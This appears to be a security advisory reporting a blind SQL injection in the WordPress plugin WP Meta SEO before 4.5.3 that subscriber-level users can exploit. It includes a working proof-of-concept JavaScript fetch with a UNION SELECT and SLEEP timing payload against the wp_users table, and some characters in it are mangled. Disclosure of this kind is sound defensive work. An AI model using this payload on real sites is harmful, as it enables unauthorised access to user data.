WP Meta SEO < 4.5.3 - Subscriber+ SQLi

The plugin does not properly sanitize and escape inputs into SQL queries, leading to a blind SQL Injection vulnerability that can be exploited by subscriber+ users.

PoC

Run the following js code in your web console on the dashboard as a subscriber: fetch( ‘admin-ajax.php’, { method: ‘POST’, headers: {‘Content-Type’: ‘application/x-www-form-urlencoded’}, body:‘action=wpms&wpms;_nonce=’ + wpms_localize.wpms_nonce + “&task;=bulk_image_copy&action;_name=img-copy-desc&ids;[]=-1) UNION (SELECT null, null, IF(1=1, SLEEP(2), SLEEP(4)) , null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM wp_users)#” } ); This statement delays the request by n*2 seconds, where n is the number of user entries in your wp_users table.